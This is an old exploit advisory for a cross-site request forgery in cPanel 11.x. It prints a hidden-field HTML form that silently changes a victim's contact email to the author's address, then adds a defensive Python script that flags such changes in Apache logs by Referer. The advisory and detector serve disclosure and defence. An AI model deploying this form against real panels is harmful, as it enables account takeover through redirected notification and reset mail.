
# Title : Cpanel 11.X Edit E-mail Cross Site Request Forgery exploit
# Published : 2010-11-21
# Author : Mon7rF .


# Exploit Title: Cpanel 11.X Edit E-mail  Cross Site Request Forgery exploit
# Date: 22 - 10 - 2010
# Author: Mon7rF
# Mail : X0h@msn.com
# Tested on: Windows 7

--------------------------------------------------------------------------------------

<form onsubmit="return do_validate(this.id);" id="mainform" name="mainform"  
action="http://www.site.com:2082/frontend/x3/contact/saveemail.html">

<input id="email"                    name="email"                    type="hidden" value="X0h@msn.com">
<input id="second_email"             name="second_email"             type="hidden" value="">
<input id="notify_disk_limit"        name="notify_disk_limit"        type="hidden" value="1">
<input id="notify_bandwidth_limit"   name="notify_bandwidth_limit"   type="hidden" value="1">
<input id="notify_email_quota_limit" name="notify_email_quota_limit" type="hidden" value="1">

<input type="submit" class="input-button" value="Save">

</form>

--------------------------------------------------------------------------------------

Gr33ts : RENO - Mr.M3x - all Member p0c Team ..
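
Added example (not part of the original advisory and not cPanel code): a log check a defender could run to spot contact-email changes that did not originate from the panel's own pages, which is the trace the form above leaves when it is submitted from another site. The Apache "combined" log layout, the host name panel.example.test, the function name suspicious_saves and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and the "email" parameter are taken from the form above.
TARGET_PATH = "/frontend/x3/contact/saveemail.html"

# Assumption: the access log uses the Apache "combined" layout.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def suspicious_saves(lines, panel_hosts):
    """Return (user, new_email, referer) for contact-email changes whose
    Referer is missing or names a host other than the panel itself."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed layout
        target = urlsplit(m["target"])
        if target.path != TARGET_PATH:
            continue
        referer_host = urlsplit(m["referer"]).hostname  # None for "-" or ""
        if referer_host in panel_hosts:
            continue  # request came from the panel's own pages
        # The form has no method attribute, so it is sent as GET and the
        # new address is visible in the logged query string.
        email = parse_qs(target.query).get("email", [""])[0]
        hits.append((m["user"], email, m["referer"]))
    return hits

# Constructed sample log lines (hosts, users and addresses are made up).
SAMPLE = [
    '203.0.113.10 - alice [22/Oct/2010:10:00:01 +0000] "GET /frontend/x3/contact/'
    'saveemail.html?email=alice%40example.test&second_email= HTTP/1.1" 200 512 '
    '"http://panel.example.test:2082/frontend/x3/contact/index.html" "Mozilla/5.0"',
    '203.0.113.20 - bob [22/Oct/2010:10:05:42 +0000] "GET /frontend/x3/contact/'
    'saveemail.html?email=someone%40example.org&second_email= HTTP/1.1" 200 512 '
    '"http://other.example.net/page.html" "Mozilla/5.0"',
    '203.0.113.20 - bob [22/Oct/2010:10:06:00 +0000] "GET /frontend/x3/index.html '
    'HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_saves(SAMPLE, {"panel.example.test"}):
        print(hit)
```

Requests with no Referer are reported as well, so expect some noise from browsers or proxies that strip the header; treat each hit as a prompt to confirm the address change with the account owner.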